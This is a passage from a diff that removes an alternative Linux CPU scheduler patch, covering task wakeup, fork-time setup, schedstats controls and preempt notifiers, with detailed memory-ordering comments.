-+		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
-+	}
-+
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+void send_call_function_single_ipi(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (!set_nr_if_polling(rq->idle))
-+		arch_send_call_function_single_ipi(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+/*
-+ * Queue a task on the target CPUs wake_list and wake the CPU via IPI if
-+ * necessary. The wakee CPU on receipt of the IPI will queue the task
-+ * via sched_ttwu_wakeup() for activation so the wakee incurs the cost
-+ * of the wakeup instead of the waker.
-+ */
-+static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
-+
-+	WRITE_ONCE(rq->ttwu_pending, 1);
-+	__smp_call_single_queue(cpu, &p->wake_entry.llist);
-+}
-+
-+static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
-+{
-+	/*
-+	 * Do not complicate things with the async wake_list while the CPU is
-+	 * in hotplug state.
-+	 */
-+	if (!cpu_active(cpu))
-+		return false;
-+
-+	/* Ensure the task will still be allowed to run on the CPU. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/*
-+	 * If the CPU does not share cache, then queue the task on the
-+	 * remote rqs wakelist to avoid accessing remote data.
-+	 */
-+	if (!cpus_share_cache(smp_processor_id(), cpu))
-+		return true;
-+
-+	if (cpu == smp_processor_id())
-+		return false;
-+
-+	/*
-+	 * If the wakee cpu is idle, or the task is descheduling and the
-+	 * only running task on the CPU, then use the wakelist to offload
-+	 * the task activation to the idle (or soon-to-be-idle) CPU as
-+	 * the current CPU is likely busy. nr_running is checked to
-+	 * avoid unnecessary task stacking.
-+	 *
-+	 * Note that we can only get here with (wakee) p->on_rq=0,
-+	 * p->on_cpu can be whatever, we've done the dequeue, so
-+	 * the wakee has been accounted out of ->nr_running.
-+	 */
-+	if (!cpu_rq(cpu)->nr_running)
-+		return true;
-+
-+	return false;
-+}
-+
-+static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
-+		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
-+		__ttwu_queue_wakelist(p, cpu, wake_flags);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_if_idle(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	rcu_read_lock();
-+
-+	if (!is_idle_task(rcu_dereference(rq->curr)))
-+		goto out;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (is_idle_task(rq->curr))
-+		resched_curr(rq);
-+	/* Else CPU is not idle, do nothing here */
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out:
-+	rcu_read_unlock();
-+}
-+
-+bool cpus_share_cache(int this_cpu, int that_cpu)
-+{
-+	if (this_cpu == that_cpu)
-+		return true;
-+
-+	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
-+}
-+#else /* !CONFIG_SMP */
-+
-+static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	return false;
-+}
-+
-+#endif /* CONFIG_SMP */
-+
-+static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (ttwu_queue_wakelist(p, cpu, wake_flags))
-+		return;
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+	ttwu_do_activate(rq, p, wake_flags);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Invoked from try_to_wake_up() to check whether the task can be woken up.
-+ *
-+ * The caller holds p::pi_lock if p != current or has preemption
-+ * disabled when p == current.
-+ *
-+ * The rules of PREEMPT_RT saved_state:
-+ *
-+ *   The related locking code always holds p::pi_lock when updating
-+ *   p::saved_state, which means the code is fully serialized in both cases.
-+ *
-+ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
-+ *   bits set. This allows to distinguish all wakeup scenarios.
-+ */
-+static __always_inline
-+bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
-+{
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
-+		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
-+			     state != TASK_RTLOCK_WAIT);
-+	}
-+
-+	if (READ_ONCE(p->__state) & state) {
-+		*success = 1;
-+		return true;
-+	}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+	/*
-+	 * Saved state preserves the task state across blocking on
-+	 * an RT lock.  If the state matches, set p::saved_state to
-+	 * TASK_RUNNING, but do not wake the task because it waits
-+	 * for a lock wakeup. Also indicate success because from
-+	 * the regular waker's point of view this has succeeded.
-+	 *
-+	 * After acquiring the lock the task will restore p::__state
-+	 * from p::saved_state which ensures that the regular
-+	 * wakeup is not lost. The restore will also set
-+	 * p::saved_state to TASK_RUNNING so any further tests will
-+	 * not result in false positives vs. @success
-+	 */
-+	if (p->saved_state & state) {
-+		p->saved_state = TASK_RUNNING;
-+		*success = 1;
-+	}
-+#endif
-+	return false;
-+}
-+
-+/*
-+ * Notes on Program-Order guarantees on SMP systems.
-+ *
-+ *  MIGRATION
-+ *
-+ * The basic program-order guarantee on SMP systems is that when a task [t]
-+ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
-+ * execution on its new CPU [c1].
-+ *
-+ * For migration (of runnable tasks) this is provided by the following means:
-+ *
-+ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
-+ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
-+ *     rq(c1)->lock (if not at the same time, then in that order).
-+ *  C) LOCK of the rq(c1)->lock scheduling in task
-+ *
-+ * Transitivity guarantees that B happens after A and C after B.
-+ * Note: we only require RCpc transitivity.
-+ * Note: the CPU doing B need not be c0 or c1
-+ *
-+ * Example:
-+ *
-+ *   CPU0            CPU1            CPU2
-+ *
-+ *   LOCK rq(0)->lock
-+ *   sched-out X
-+ *   sched-in Y
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(0)->lock // orders against CPU0
-+ *                                   dequeue X
-+ *                                   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(1)->lock
-+ *                                   enqueue X
-+ *                                   UNLOCK rq(1)->lock
-+ *
-+ *                   LOCK rq(1)->lock // orders against CPU2
-+ *                   sched-out Z
-+ *                   sched-in X
-+ *                   UNLOCK rq(1)->lock
-+ *
-+ *
-+ *  BLOCKING -- aka. SLEEP + WAKEUP
-+ *
-+ * For blocking we (obviously) need to provide the same guarantee as for
-+ * migration. However the means are completely different as there is no lock
-+ * chain to provide order. Instead we do:
-+ *
-+ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
-+ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
-+ *
-+ * Example:
-+ *
-+ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
-+ *
-+ *   LOCK rq(0)->lock LOCK X->pi_lock
-+ *   dequeue X
-+ *   sched-out X
-+ *   smp_store_release(X->on_cpu, 0);
-+ *
-+ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
-+ *                    X->state = WAKING
-+ *                    set_task_cpu(X,2)
-+ *
-+ *                    LOCK rq(2)->lock
-+ *                    enqueue X
-+ *                    X->state = RUNNING
-+ *                    UNLOCK rq(2)->lock
-+ *
-+ *                                          LOCK rq(2)->lock // orders against CPU1
-+ *                                          sched-out Z
-+ *                                          sched-in X
-+ *                                          UNLOCK rq(2)->lock
-+ *
-+ *                    UNLOCK X->pi_lock
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *
-+ * However; for wakeups there is a second guarantee we must provide, namely we
-+ * must observe the state that lead to our wakeup. That is, not only must our
-+ * task observe its own prior state, it must also observe the stores prior to
-+ * its wakeup.
-+ *
-+ * This means that any means of doing remote wakeups must order the CPU doing
-+ * the wakeup against the CPU the task is going to end up running on. This,
-+ * however, is already required for the regular Program-Order guarantee above,
-+ * since the waking CPU is the one issueing the ACQUIRE (smp_cond_load_acquire).
-+ *
-+ */
-+
-+/**
-+ * try_to_wake_up - wake up a thread
-+ * @p: the thread to be awakened
-+ * @state: the mask of task states that can be woken
-+ * @wake_flags: wake modifier flags (WF_*)
-+ *
-+ * Conceptually does:
-+ *
-+ *   If (@state & @p->state) @p->state = TASK_RUNNING.
-+ *
-+ * If the task was not queued/runnable, also place it back on a runqueue.
-+ *
-+ * This function is atomic against schedule() which would dequeue the task.
-+ *
-+ * It issues a full memory barrier before accessing @p->state, see the comment
-+ * with set_current_state().
-+ *
-+ * Uses p->pi_lock to serialize against concurrent wake-ups.
-+ *
-+ * Relies on p->pi_lock stabilizing:
-+ *  - p->sched_class
-+ *  - p->cpus_ptr
-+ *  - p->sched_task_group
-+ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
-+ *
-+ * Tries really hard to only take one task_rq(p)->lock for performance.
-+ * Takes rq->lock in:
-+ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
-+ *  - ttwu_queue()       -- new rq, for enqueue of the task;
-+ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
-+ *
-+ * As a consequence we race really badly with just about everything. See the
-+ * many memory barriers and their comments for details.
-+ *
-+ * Return: %true if @p->state changes (an actual wakeup was done),
-+ *	   %false otherwise.
-+ */
-+static int try_to_wake_up(struct task_struct *p, unsigned int state,
-+			  int wake_flags)
-+{
-+	unsigned long flags;
-+	int cpu, success = 0;
-+
-+	preempt_disable();
-+	if (p == current) {
-+		/*
-+		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
-+		 * == smp_processor_id()'. Together this means we can special
-+		 * case the whole 'p->on_rq && ttwu_runnable()' case below
-+		 * without taking any locks.
-+		 *
-+		 * In particular:
-+		 *  - we rely on Program-Order guarantees for all the ordering,
-+		 *  - we're serialized against set_special_state() by virtue of
-+		 *    it disabling IRQs (this allows not taking ->pi_lock).
-+		 */
-+		if (!ttwu_state_match(p, state, &success))
-+			goto out;
-+
-+		trace_sched_waking(p);
-+		WRITE_ONCE(p->__state, TASK_RUNNING);
-+		trace_sched_wakeup(p);
-+		goto out;
-+	}
-+
-+	/*
-+	 * If we are going to wake up a thread waiting for CONDITION we
-+	 * need to ensure that CONDITION=1 done by the caller can not be
-+	 * reordered with p->state check below. This pairs with smp_store_mb()
-+	 * in set_current_state() that the waiting thread does.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	smp_mb__after_spinlock();
-+	if (!ttwu_state_match(p, state, &success))
-+		goto unlock;
-+
-+	trace_sched_waking(p);
-+
-+	/*
-+	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
-+	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
-+	 * in smp_cond_load_acquire() below.
-+	 *
-+	 * sched_ttwu_pending()			try_to_wake_up()
-+	 *   STORE p->on_rq = 1			  LOAD p->state
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * [task p]
-+	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * A similar smb_rmb() lives in try_invoke_on_locked_down_task().
-+	 */
-+	smp_rmb();
-+	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
-+		goto unlock;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
-+	 * possible to, falsely, observe p->on_cpu == 0.
-+	 *
-+	 * One must be running (->on_cpu == 1) in order to remove oneself
-+	 * from the runqueue.
-+	 *
-+	 * __schedule() (switch to task 'p')	try_to_wake_up()
-+	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (put 'p' to sleep)
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
-+	 * schedule()'s deactivate_task() has 'happened' and p will no longer
-+	 * care about it's own p->state. See the comment in __schedule().
-+	 */
-+	smp_acquire__after_ctrl_dep();
-+
-+	/*
-+	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
-+	 * == 0), which means we need to do an enqueue, change p->state to
-+	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
-+	 * enqueue, such as ttwu_queue_wakelist().
-+	 */
-+	WRITE_ONCE(p->__state, TASK_WAKING);
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, considering queueing p on the remote CPUs wake_list
-+	 * which potentially sends an IPI instead of spinning on p->on_cpu to
-+	 * let the waker make forward progress. This is safe because IRQs are
-+	 * disabled and the IPI will deliver after on_cpu is cleared.
-+	 *
-+	 * Ensure we load task_cpu(p) after p->on_cpu:
-+	 *
-+	 * set_task_cpu(p, cpu);
-+	 *   STORE p->cpu = @cpu
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock
-+	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
-+	 *   STORE p->on_cpu = 1                LOAD p->cpu
-+	 *
-+	 * to ensure we observe the correct CPU on which the task is currently
-+	 * scheduling.
-+	 */
-+	if (smp_load_acquire(&p->on_cpu) &&
-+	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
-+		goto unlock;
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, wait until it's done referencing the task.
-+	 *
-+	 * Pairs with the smp_store_release() in finish_task().
-+	 *
-+	 * This ensures that tasks getting woken will be fully ordered against
-+	 * their previous state and preserve Program Order.
-+	 */
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+	sched_task_ttwu(p);
-+
-+	cpu = select_task_rq(p);
-+
-+	if (cpu != task_cpu(p)) {
-+		if (p->in_iowait) {
-+			delayacct_blkio_end(p);
-+			atomic_dec(&task_rq(p)->nr_iowait);
-+		}
-+
-+		wake_flags |= WF_MIGRATED;
-+		psi_ttwu_dequeue(p);
-+		set_task_cpu(p, cpu);
-+	}
-+#else
-+	cpu = task_cpu(p);
-+#endif /* CONFIG_SMP */
-+
-+	ttwu_queue(p, cpu, wake_flags);
-+unlock:
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+out:
-+	if (success)
-+		ttwu_stat(p, task_cpu(p), wake_flags);
-+	preempt_enable();
-+
-+	return success;
-+}
-+
-+static bool __task_needs_rq_lock(struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
-+	 * the task is blocked. Make sure to check @state since ttwu() can drop
-+	 * locks at the end, see ttwu_queue_wakelist().
-+	 */
-+	if (state == TASK_RUNNING || state == TASK_WAKING)
-+		return true;
-+
-+	/*
-+	 * Ensure we load p->on_rq after p->__state, otherwise it would be
-+	 * possible to, falsely, observe p->on_rq == 0.
-+	 *
-+	 * See try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	if (p->on_rq)
-+		return true;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure the task has finished __schedule() and will not be referenced
-+	 * anymore. Again, see try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+#endif
-+
-+	return false;
-+}
-+
-+/**
-+ * task_call_func - Invoke a function on task in fixed state
-+ * @p: Process for which the function is to be invoked, can be @current.
-+ * @func: Function to invoke.
-+ * @arg: Argument to function.
-+ *
-+ * Fix the task in it's current state by avoiding wakeups and or rq operations
-+ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
-+ * to work out what the state is, if required.  Given that @func can be invoked
-+ * with a runqueue lock held, it had better be quite lightweight.
-+ *
-+ * Returns:
-+ *   Whatever @func returns
-+ */
-+int task_call_func(struct task_struct *p, task_call_f func, void *arg)
-+{
-+	struct rq *rq = NULL;
-+	struct rq_flags rf;
-+	int ret;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
-+
-+	if (__task_needs_rq_lock(p))
-+		rq = __task_rq_lock(p, &rf);
-+
-+	/*
-+	 * At this point the task is pinned; either:
-+	 *  - blocked and we're holding off wakeups      (pi->lock)
-+	 *  - woken, and we're holding off enqueue       (rq->lock)
-+	 *  - queued, and we're holding off schedule     (rq->lock)
-+	 *  - running, and we're holding off de-schedule (rq->lock)
-+	 *
-+	 * The called function (@func) can use: task_curr(), p->on_rq and
-+	 * p->__state to differentiate between these states.
-+	 */
-+	ret = func(p, arg);
-+
-+	if (rq)
-+		__task_rq_unlock(rq, &rf);
-+
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
-+	return ret;
-+}
-+
-+/**
-+ * cpu_curr_snapshot - Return a snapshot of the currently running task
-+ * @cpu: The CPU on which to snapshot the task.
-+ *
-+ * Returns the task_struct pointer of the task "currently" running on
-+ * the specified CPU.  If the same task is running on that CPU throughout,
-+ * the return value will be a pointer to that task's task_struct structure.
-+ * If the CPU did any context switches even vaguely concurrently with the
-+ * execution of this function, the return value will be a pointer to the
-+ * task_struct structure of a randomly chosen task that was running on
-+ * that CPU somewhere around the time that this function was executing.
-+ *
-+ * If the specified CPU was offline, the return value is whatever it
-+ * is, perhaps a pointer to the task_struct structure of that CPU's idle
-+ * task, but there is no guarantee.  Callers wishing a useful return
-+ * value must take some action to ensure that the specified CPU remains
-+ * online throughout.
-+ *
-+ * This function executes full memory barriers before and after fetching
-+ * the pointer, which permits the caller to confine this function's fetch
-+ * with respect to the caller's accesses to other shared variables.
-+ */
-+struct task_struct *cpu_curr_snapshot(int cpu)
-+{
-+	struct task_struct *t;
-+
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	t = rcu_dereference(cpu_curr(cpu));
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	return t;
-+}
-+
-+/**
-+ * wake_up_process - Wake up a specific process
-+ * @p: The process to be woken up.
-+ *
-+ * Attempt to wake up the nominated process and move it to the set of runnable
-+ * processes.
-+ *
-+ * Return: 1 if the process was woken up, 0 if it was already running.
-+ *
-+ * This function executes a full memory barrier before accessing the task state.
-+ */
-+int wake_up_process(struct task_struct *p)
-+{
-+	return try_to_wake_up(p, TASK_NORMAL, 0);
-+}
-+EXPORT_SYMBOL(wake_up_process);
-+
-+int wake_up_state(struct task_struct *p, unsigned int state)
-+{
-+	return try_to_wake_up(p, state, 0);
-+}
-+
-+/*
-+ * Perform scheduler related setup for a newly forked process p.
-+ * p is forked by current.
-+ *
-+ * __sched_fork() is basic setup used by init_idle() too:
-+ */
-+static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	p->on_rq			= 0;
-+	p->on_cpu			= 0;
-+	p->utime			= 0;
-+	p->stime			= 0;
-+	p->sched_time			= 0;
-+
-+#ifdef CONFIG_SCHEDSTATS
-+	/* Even if schedstat is disabled, there should not be garbage */
-+	memset(&p->stats, 0, sizeof(p->stats));
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+	INIT_HLIST_HEAD(&p->preempt_notifiers);
-+#endif
-+
-+#ifdef CONFIG_COMPACTION
-+	p->capture_control = NULL;
-+#endif
-+#ifdef CONFIG_SMP
-+	p->wake_entry.u_flags = CSD_TYPE_TTWU;
-+#endif
-+}
-+
-+/*
-+ * fork()/clone()-time setup:
-+ */
-+int sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	__sched_fork(clone_flags, p);
-+	/*
-+	 * We mark the process as NEW here. This guarantees that
-+	 * nobody will actually run it, and a signal or other external
-+	 * event cannot wake it up and insert it on the runqueue either.
-+	 */
-+	p->__state = TASK_NEW;
-+
-+	/*
-+	 * Make sure we do not leak PI boosting priority to the child.
-+	 */
-+	p->prio = current->normal_prio;
-+
-+	/*
-+	 * Revert to default priority/policy on fork if requested.
-+	 */
-+	if (unlikely(p->sched_reset_on_fork)) {
-+		if (task_has_rt_policy(p)) {
-+			p->policy = SCHED_NORMAL;
-+			p->static_prio = NICE_TO_PRIO(0);
-+			p->rt_priority = 0;
-+		} else if (PRIO_TO_NICE(p->static_prio) < 0)
-+			p->static_prio = NICE_TO_PRIO(0);
-+
-+		p->prio = p->normal_prio = p->static_prio;
-+
-+		/*
-+		 * We don't need the reset flag anymore after the fork. It has
-+		 * fulfilled its duty:
-+		 */
-+		p->sched_reset_on_fork = 0;
-+	}
-+
-+#ifdef CONFIG_SCHED_INFO
-+	if (unlikely(sched_info_on()))
-+		memset(&p->sched_info, 0, sizeof(p->sched_info));
-+#endif
-+	init_task_preempt_count(p);
-+
-+	return 0;
-+}
-+
-+void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	/*
-+	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
-+	 * required yet, but lockdep gets upset if rules are violated.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	/*
-+	 * Share the timeslice between parent and child, thus the
-+	 * total amount of pending timeslices in the system doesn't change,
-+	 * resulting in more scheduling fairness.
-+	 */
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->curr->time_slice /= 2;
-+	p->time_slice = rq->curr->time_slice;
-+#ifdef CONFIG_SCHED_HRTICK
-+	hrtick_start(rq, rq->curr->time_slice);
-+#endif
-+
-+	if (p->time_slice < RESCHED_NS) {
-+		p->time_slice = sched_timeslice_ns;
-+		resched_curr(rq);
-+	}
-+	sched_task_fork(p, rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rseq_migrate(p);
-+	/*
-+	 * We're setting the CPU for the first time, we don't migrate,
-+	 * so use __set_task_cpu().
-+	 */
-+	__set_task_cpu(p, smp_processor_id());
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+void sched_post_fork(struct task_struct *p)
-+{
-+}
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+DEFINE_STATIC_KEY_FALSE(sched_schedstats);
-+
-+static void set_schedstats(bool enabled)
-+{
-+	if (enabled)
-+		static_branch_enable(&sched_schedstats);
-+	else
-+		static_branch_disable(&sched_schedstats);
-+}
-+
-+void force_schedstat_enabled(void)
-+{
-+	if (!schedstat_enabled()) {
-+		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
-+		static_branch_enable(&sched_schedstats);
-+	}
-+}
-+
-+static int __init setup_schedstats(char *str)
-+{
-+	int ret = 0;
-+	if (!str)
-+		goto out;
-+
-+	if (!strcmp(str, "enable")) {
-+		set_schedstats(true);
-+		ret = 1;
-+	} else if (!strcmp(str, "disable")) {
-+		set_schedstats(false);
-+		ret = 1;
-+	}
-+out:
-+	if (!ret)
-+		pr_warn("Unable to parse schedstats=\n");
-+
-+	return ret;
-+}
-+__setup("schedstats=", setup_schedstats);
-+
-+#ifdef CONFIG_PROC_SYSCTL
-+static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
-+		size_t *lenp, loff_t *ppos)
-+{
-+	struct ctl_table t;
-+	int err;
-+	int state = static_branch_likely(&sched_schedstats);
-+
-+	if (write && !capable(CAP_SYS_ADMIN))
-+		return -EPERM;
-+
-+	t = *table;
-+	t.data = &state;
-+	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
-+	if (err < 0)
-+		return err;
-+	if (write)
-+		set_schedstats(state);
-+	return err;
-+}
-+
-+static struct ctl_table sched_core_sysctls[] = {
-+	{
-+		.procname       = "sched_schedstats",
-+		.data           = NULL,
-+		.maxlen         = sizeof(unsigned int),
-+		.mode           = 0644,
-+		.proc_handler   = sysctl_schedstats,
-+		.extra1         = SYSCTL_ZERO,
-+		.extra2         = SYSCTL_ONE,
-+	},
-+	{}
-+};
-+static int __init sched_core_sysctl_init(void)
-+{
-+	register_sysctl_init("kernel", sched_core_sysctls);
-+	return 0;
-+}
-+late_initcall(sched_core_sysctl_init);
-+#endif /* CONFIG_PROC_SYSCTL */
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+/*
-+ * wake_up_new_task - wake up a newly created task for the first time.
-+ *
-+ * This function will do some initial scheduler statistics housekeeping
-+ * that must be done for every newly created context, then puts the task
-+ * on the runqueue and wakes it.
-+ */
-+void wake_up_new_task(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	rq = cpu_rq(select_task_rq(p));
-+#ifdef CONFIG_SMP
-+	rseq_migrate(p);
-+	/*
-+	 * Fork balancing, do it here and not earlier because:
-+	 * - cpus_ptr can change in the fork path
-+	 * - any previously selected CPU might disappear through hotplug
-+	 *
-+	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
-+	 * as we're not fully set-up yet.
-+	 */
-+	__set_task_cpu(p, cpu_of(rq));
-+#endif
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	activate_task(p, rq);
-+	trace_sched_wakeup_new(p);
-+	check_preempt_curr(rq);
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+
-+static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
-+
-+void preempt_notifier_inc(void)
-+{
-+	static_branch_inc(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_inc);
-+
-+void preempt_notifier_dec(void)
-+{
-+	static_branch_dec(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_dec);
-+
-+/**
-+ * preempt_notifier_register - tell me when current is being preempted & rescheduled
-+ * @notifier: notifier struct to register
-+ */
-+void preempt_notifier_register(struct preempt_notifier *notifier)
-+{
-+	if (!static_branch_unlikely(&preempt_notifier_key))
-+		WARN(1, "registering preempt_notifier while notifiers disabled\n");
-+
-+	hlist_add_head(&notifier->link, &current->preempt_notifiers);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_register);
-+
-+/**
-+ * preempt_notifier_unregister - no longer interested in preemption notifications
-+ * @notifier: notifier struct to unregister
-+ *
-+ * This is *not* safe to call from within a preemption notifier.
-+ */
-+void preempt_notifier_unregister(struct preempt_notifier *notifier)
-+{
-+	hlist_del(&notifier->link);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
-+
-+static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_in(notifier, raw_smp_processor_id());
-+}
-+
-+static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_in_preempt_notifiers(curr);
-+}
-+
-+static void
-+__fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				   struct task_struct *next)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_out(notifier, next);
-+}
-+
-+static __always_inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_out_preempt_notifiers(curr, next);
-+}
-+
-+#else /* !CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+}
-+
-+static inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+}
-+
-+#endif /* CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void prepare_task(struct task_struct *next)
-+{
-+	/*
-+	 * Claim the task as running, we do this before switching to it
-+	 * such that any running task will have this set.
-+	 *
-+	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
-+	 * its ordering comment.
-+	 */
-+	WRITE_ONCE(next->on_cpu, 1);
-+}
-+
-+static inline void finish_task(struct task_struct *prev)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * This must be the very last reference to @prev from this CPU. After
-+	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
-+	 * must ensure this doesn't happen until the switch is completely
-+	 * finished.
-+	 *
-+	 * In particular, the load of prev->state in finish_task_switch() must
-+	 * happen before this.
-+	 *
-+	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
-+	 */
-+	smp_store_release(&prev->on_cpu, 0);
-+#else
-+	prev->on_cpu = 0;
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	void (*func)(struct rq *rq);
